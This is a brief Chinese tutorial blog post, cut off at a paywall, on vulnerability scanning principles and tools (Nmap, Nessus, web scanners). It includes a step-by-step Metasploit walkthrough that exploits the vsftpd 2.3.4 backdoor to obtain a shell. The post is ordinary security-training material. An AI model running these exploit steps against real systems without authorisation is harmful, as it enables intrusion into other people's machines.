漏洞扫描原理
漏洞扫描器对漏洞进行扫描,以验证具体目标是否存在对应的具体漏洞。但是也存在错误扫描,需要对扫描结果进行漏洞验证。
其实扫描器的原理大致相同都是通过发送对应的验证数据到目标具体服务进行验证。当收到目标返回的响应与存在漏洞的响应一致时,就表明存在漏洞。
漏洞扫描工具
Nmap
nmap --script vuln 目标IP地址
Nessus 系统漏洞扫描
**Metasploit **对扫描到的漏洞加以利用
以vsftpd2.3.4为例
search vsftpd
得到
use (复制粘贴上面的路径)
show payloads
set payload cmd/unix/interact //上面展示的路径
show options 设置所用的参数
set rhost(上面name下面的) ip
show options 观察是否设置成功
exploit 溢出
得到shell
web应用程序漏洞扫描
针对web应用程序的漏洞扫描其实就是每个扫描器读取自己的payload进行探测
常见Web漏洞扫描器:
1.Owasp-zap
2.awvs
3.appscan
4.nikto
5.Burpsuite
每个扫描器都有各自不同的payload探测
Woasp-zap

本文介绍了漏洞扫描的基本原理,通过发送验证数据到目标服务,根据响应判断是否存在漏洞。提到了Nmap和Nessus等扫描工具,以及Metasploit用于漏洞利用。在Web应用程序漏洞扫描部分,列举了Owasp-ZAP、AWVS等常见扫描器,并以Sqlmap为例展示了如何利用SQL注入漏洞。
最低0.47元/天 解锁文章
1万+

被折叠的 条评论
为什么被折叠?



